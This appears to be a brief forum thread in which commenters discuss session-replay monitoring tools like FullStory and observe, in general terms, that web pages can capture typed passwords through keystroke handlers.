[nja]

I used to think this, until I happened across FullStory. With that tool you can replay a website visitor's exact session as if it was recorded live on video -- everything they typed (even if it was cleared and never sent in a request), where/when clicks happened, the contents and response of every request, etc.

As a backend engineer, I had no idea that frontend monitoring was this advanced, but apparently it is. So now we all have to be extra paranoid, because _any_ website could be using this tool to "spy" on everybody.

Of course, it _was_ very helpful to us in tracking down some issues (ever tried to tell a customer how to send you a HAR?). And I assume that operating with an adblocker and blocking nonessential cookies will prevent or hamper the output for us more technical types. Even so...

[4ggr0]

> everything they typed (even if it was cleared and never sent in a request)

Okay, wow, that sounds rough...so in a way, phishing attacks don't even require you to login anymore, just typing the password or maybe 75% of it is enough to get you.

[Mavvie]

That's not new, is it? You could always have an onchange/oninput handler on the login fields and send it to your server.

[uoaei]

Back when Facebook made their huge update to convert to a one-page-app, it was pretty obvious they were doing this because on tenuous connections the interactions with the text would be very strange, as if they are caching your text and operating on it server-side using commands sent from client-side.

[jfrunyon]

Uhh... yeah, just typing the password (or letting your password manager autofill when you get cache poisoned or whatever) has always been enough to get you. onkeydown has existed longer than phishing.